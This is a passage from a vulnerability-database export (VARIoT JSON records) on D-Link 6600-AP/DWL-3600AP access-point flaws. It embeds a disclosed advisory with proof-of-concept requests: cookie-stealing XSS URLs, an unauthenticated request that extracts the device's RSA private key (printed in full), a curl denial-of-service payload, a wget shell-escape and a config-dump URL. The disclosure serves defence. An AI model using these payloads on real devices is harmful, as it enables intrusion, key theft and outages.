(10.90.90.91)\u0027 can\u0027t be established. \nRSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. \nAre you sure you want to continue connecting (yes/no)? yes\nWarning: Permanently added \u002710.90.90.91\u0027 (RSA) to the list of known hosts. \nadmin@10.90.90.91\u0027s password:\nEnter \u0027help\u0027 for help. \n\nDLINK-WLAN-AP# help\n\n## Report Timeline\n22/05/2019 : This advisory is sent to D-Link - the contents of this\nReport will be made public within 30 days. \n22/06/2019 : Public release of the security advisory to mailing list\n\n## Fixes/Updates\nftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip\nftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip\n\n\n## About me - pwn.sandstorm@gmail.com\n#### Independent EMSecurity Researcher in the field of IoT under the Sun\n#### Always open to hack and share\n#### Greetings - Ack P. Kim and others for the online resources\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14333"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "VULHUB",
"id": "VHN-146269"
},
{
"db": "PACKETSTORM",
"id": "153840"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "153840",
"trust": 3.2
},
{
"db": "NVD",
"id": "CVE-2019-14333",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1639",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-29140",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-146269",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "VULHUB",
"id": "VHN-146269"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
},
{
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"id": "VAR-201908-0911",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "VULHUB",
"id": "VHN-146269"
}
],
"trust": 1.3903846
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
}
]
},
"last_update_date": "2024-11-23T21:52:00.729000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory",
"trust": 0.8,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"title": "Security Bulletin",
"trust": 0.8,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"title": "Patch for D-Link 6600-AP and DWL-3600AP Denial of Service Vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/177599"
},
{
"title": "D-Link 6600-AP and DWL-3600AP Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=95748"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-20",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146269"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/153840/d-link-6600-ap-xss-dos-information-disclosure.html"
},
{
"trust": 1.7,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"trust": 1.7,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14333"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14333"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14336"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14332"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14335"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=%s"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027pwned\u0027)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14337"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14334"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/sslcert-get.cgi?"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14338"
},
{
"trust": 0.1,
"url": "https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action="
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "VULHUB",
"id": "VHN-146269"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
},
{
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "VULHUB",
"id": "VHN-146269"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
},
{
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"date": "2019-08-01T00:00:00",
"db": "VULHUB",
"id": "VHN-146269"
},
{
"date": "2019-08-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"date": "2019-07-31T19:01:29",
"db": "PACKETSTORM",
"id": "153840"
},
{
"date": "2019-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1639"
},
{
"date": "2019-08-01T13:15:14.023000",
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-146269"
},
{
"date": "2019-08-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1639"
},
{
"date": "2024-11-21T04:26:31.713000",
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link 6600-AP and DWL-3600AP Vulnerability related to input validation on devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
}
],
"trust": 0.6
}
}
VAR-201908-0915
Vulnerability from variot - Updated: 2024-11-23 21:52An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is an ability to escape to a shell in the restricted command line interface, as demonstrated by the /bin/sh -c wget sequence. D-Link 6600-AP and DWL-3600AP Devices have vulnerabilities related to authorization, permissions, and access control.Information may be obtained. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. There are currently no detailed details of the vulnerability provided. D-Link 6600-AP and DWL-3600AP version 4.2.0.14 has a permission and access control issue vulnerability. An attacker could exploit this vulnerability to gain access to a restricted CLI shell. # Security Advisory - 22/07/2019
Multiple vulnerabilities found in the D-Link 6600-AP device running
the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Not that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP
This advisory is sent to D-Link the 22/05/2019
Many Thanks to the D-Link Security Team for their prompt reactivity!
Affected Product
D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP
Firmware version
4.2.0.14 Revision Ax date: 21/03/2019
Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
Product Identifier
WLAN-EAP
Hardware Version
A2
Manufacturer
D-LINK
Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
List of Vulnerabilities
- CVE-2019-14338 - Post-authenticated XSS
- CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command
- CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP
- CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP
- CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)
- CVE-2019-14332 - Use of weak ciphers for SSH
1. Post-authenticated XSS
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14338
Proof-of concept
Example 1: http://10.90.90.91/admin.cgi?action=alert(document.cookie)
Example 2: http://10.90.90.91/admin.cgi?action=+guestalert('Pwned')
2. Post-authenticated Certificate and RSA Private Key extraction
through http command
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14334
Proof-of concept
http://10.90.90.91/sslcert-get.cgi?
Result of the command: File "mini_httpd.pem" automatically extracted
-----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee Hk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o BioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B vsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t 7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c unyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk 1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6 J8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14 yRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z 0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc fmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB i5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb dAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ OztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ VuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9 J3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr H975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw uF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy yGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd pagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co paZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8 1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm fPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS okObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px bgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx MC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp bmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL MAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU MBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG A1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE CBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu OTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB BQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp wRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC I+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW 2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK YwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N 29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B AQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS 7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME 9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5 beF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE 45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef MjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ== -----END CERTIFICATE-----
3. Pre-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID: CVE-2019-14333
Proof-of concept
kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
4.
DLINK-WLAN-AP# /bin/sh -c wget
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL
Retrieve files via HTTP or FTP
Options: -s Spider mode - only check file existence -c Continue retrieval of aborted transfer -q Quiet -P DIR Save to DIR (default .) -T SEC Network read timeout is SEC seconds -O FILE Save to FILE ('-' for stdout) -U STR Use STR for User-Agent header -Y Use proxy ('on' or 'off')
DLINK-WLAN-AP#
5. Post-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14335
Proof-of concept
http://10.90.90.91/admin.cgi?action=%s
6. Post-authenticated Dump all the config files
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14336
Proof-of concept
http://10.90.90.91/admin.cgi?action=
7. Use of weak ciphers
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14332
Proof-of concept
root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1 The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established. RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts. admin@10.90.90.91's password: Enter 'help' for help.
DLINK-WLAN-AP# help
Report Timeline
22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days. 22/06/2019 : Public release of the security advisory to mailing list
Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip
About me - pwn.sandstorm@gmail.com
Independent EMSecurity Researcher in the field of IoT under the Sun
Always open to hack and share
Greetings - Ack P. Kim and others for the online resources
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201908-0915",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "6600-ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "d-link 6600-ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "6600-ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dwl-3600ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29141"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007493"
},
{
"db": "NVD",
"id": "CVE-2019-14337"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:6600-ap_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dwl-3600ap_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007493"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sandstorm Security",
"sources": [
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1630"
}
],
"trust": 0.7
},
"cve": "CVE-2019-14337",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2019-14337",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2019-29141",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "VHN-146273",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2019-14337",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-14337",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-14337",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-14337",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2019-29141",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-1630",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-146273",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29141"
},
{
"db": "VULHUB",
"id": "VHN-146273"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007493"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1630"
},
{
"db": "NVD",
"id": "CVE-2019-14337"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
